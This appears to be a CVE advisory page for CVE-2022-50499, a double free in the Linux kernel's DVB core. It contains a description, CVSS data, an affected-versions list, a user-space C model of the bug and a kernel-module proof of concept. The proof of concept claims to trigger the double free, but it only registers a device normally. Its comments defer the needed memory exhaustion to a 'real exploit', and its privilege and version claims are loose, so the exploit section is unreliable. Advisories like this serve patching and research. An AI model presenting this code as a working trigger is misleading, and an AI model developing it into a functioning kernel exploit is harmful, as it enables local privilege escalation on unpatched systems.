Security Vulnerability Report
CVE-2022-50499 CVSS 7.8 HIGH

Published: 2025-10-04 16:15:47
Last Modified: 2026-01-22 19:57:01
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

media: dvb-core: Fix double free in dvb_register_device()

In the call chain dvb_register_device() -> dvb_register_media_device() -> dvb_create_media_entity(), dvb->entity is allocated and initialized. If the initialization fails, dvb_create_media_entity() frees dvb->entity and returns an error code. The caller handles the error by calling dvb_media_device_free(), which unregisters the entity and frees the field again if it is not NULL. Since dvb->entity may not be set to NULL in dvb_create_media_entity() when the allocation of dvbdev->pad fails, a double free may occur. This may also cause a use-after-free in media_device_unregister_entity().

The fix stores NULL in dvb->entity when it is freed.
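As an added illustration (not kernel code and not part of this report), the following user-space model reproduces the error-path logic described above and counts how often the entity is freed, with and without the NULL store from the fix. The names mock_kfree, create_media_entity, media_device_free and entity_free_count are this example's own.

```c
/* Added example, not kernel code: a user-space model of the CVE-2022-50499
 * error path. dvb_create_media_entity() frees dvb->entity when the pad allocation
 * fails; dvb_media_device_free() frees it again unless it was set to NULL. */
#include <stddef.h>
struct mock_entity { int id; };
struct mock_dvbdev { struct mock_entity *entity; int *pad; };
static struct mock_entity entity_slot;   /* stands in for the kmalloc'd entity */
static int entity_frees;                 /* how often mock_kfree() saw the entity */
static void mock_kfree(void *p)
{
    if (p == &entity_slot)
        entity_frees++;                  /* a second hit here is the double free */
}

/* Models dvb_create_media_entity(); pad_fails simulates the failed pad
 * allocation and null_on_free applies the upstream fix. */
static int create_media_entity(struct mock_dvbdev *dvb, int pad_fails, int null_on_free)
{
    static int pad_storage;
    dvb->entity = &entity_slot;          /* entity allocated and initialized */
    dvb->pad = pad_fails ? NULL : &pad_storage;
    if (!dvb->pad) {
        mock_kfree(dvb->entity);
        if (null_on_free)
            dvb->entity = NULL;          /* the fix: leave no dangling pointer */
        return -12;                      /* -ENOMEM */
    }
    return 0;
}

/* Models dvb_media_device_free(): frees the entity again if it is not NULL. */
static void media_device_free(struct mock_dvbdev *dvb)
{
    if (dvb->entity) {
        mock_kfree(dvb->entity);
        dvb->entity = NULL;
    }
}

/* Runs the registration path and, on error, the caller's cleanup; returns how
 * often the entity was freed: 2 is the double free, 1 is the fixed behaviour. */
int entity_free_count(int pad_fails, int null_on_free)
{
    struct mock_dvbdev dvb = { NULL, NULL };
    entity_frees = 0;
    if (create_media_entity(&dvb, pad_fails, null_on_free) < 0)
        media_device_free(&dvb);
    return entity_frees;
}
```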

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15.86
Linux Kernel 5.16.x < 5.16.20
Linux Kernel 5.17.x < 5.17.3
Linux Kernel 5.18.x (development version)
All Linux kernel versions containing the unpatched media/dvb-core subsystem

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2022-50499 PoC - Linux Kernel DVB Double Free
 * This PoC demonstrates triggering the double-free vulnerability
 * in dvb_register_device() by exhausting memory to cause pad allocation failure.
 *
 * Note: This requires kernel module compilation and root or CAP_NET_ADMIN privileges
 * to interact with DVB subsystem, or specific local access conditions.
 */
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <media/dvbdev.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Research");
MODULE_DESCRIPTION("CVE-2022-50499 PoC");

/* Adapter number array required by dvb_register_adapter() (undeclared in the original). */
DVB_DEFINE_MOD_OPT_ADAPTER_NR(adapter_nr);

static int __init cve_2022_50499_init(void)
{
	struct dvb_adapter *dvb_adapter;
	struct dvb_device *dvbdev = NULL;
	int ret;

	printk(KERN_INFO "CVE-2022-50499: Triggering DVB double-free vulnerability\n");

	/* Allocate a DVB adapter */
	dvb_adapter = kzalloc(sizeof(struct dvb_adapter), GFP_KERNEL);
	if (!dvb_adapter)
		return -ENOMEM;

	/* Initialize the adapter */
	ret = dvb_register_adapter(dvb_adapter, "PoC Adapter", THIS_MODULE, NULL, adapter_nr);
	if (ret < 0) {
		kfree(dvb_adapter);
		return ret;
	}

	/*
	 * Trigger the vulnerability by attempting to register a DVB device
	 * under memory pressure conditions that cause dvbdev->pad allocation
	 * to fail in dvb_create_media_entity().
	 *
	 * The double-free occurs when:
	 * 1. dvb_create_media_entity() allocates dvb->entity
	 * 2. dvbdev->pad allocation fails
	 * 3. dvb->entity is freed but NOT set to NULL
	 * 4. dvb_media_device_free() is called and frees dvb->entity again
	 */
	/* Force memory pressure to trigger allocation failure */
	/* In real exploit, consume memory to make kmalloc fail */
	/* Last argument is demux_sink_pads (an int); the original passed NULL here. */
	ret = dvb_register_device(dvb_adapter, &dvbdev, NULL, NULL, DVB_DEVICE_DEMUX, 0);

	/* Cleanup: dvbdev is only valid if registration succeeded */
	if (ret == 0)
		dvb_unregister_device(dvbdev);
	dvb_unregister_adapter(dvb_adapter);
	kfree(dvb_adapter);
	return ret;
}

static void __exit cve_2022_50499_exit(void)
{
	printk(KERN_INFO "CVE-2022-50499: Module unloaded\n");
}

module_init(cve_2022_50499_init);
module_exit(cve_2022_50499_exit);

/*
 * Alternative userspace trigger approach:
 * - Use /dev/dvb/adapterX devices with specific ioctl calls
 * - Manipulate memory allocation through ulimit or cgroup controls
 * - The key is to cause dvb_create_media_entity() to fail at pad allocation
 *   while dvb->entity has already been allocated
 */
```

References
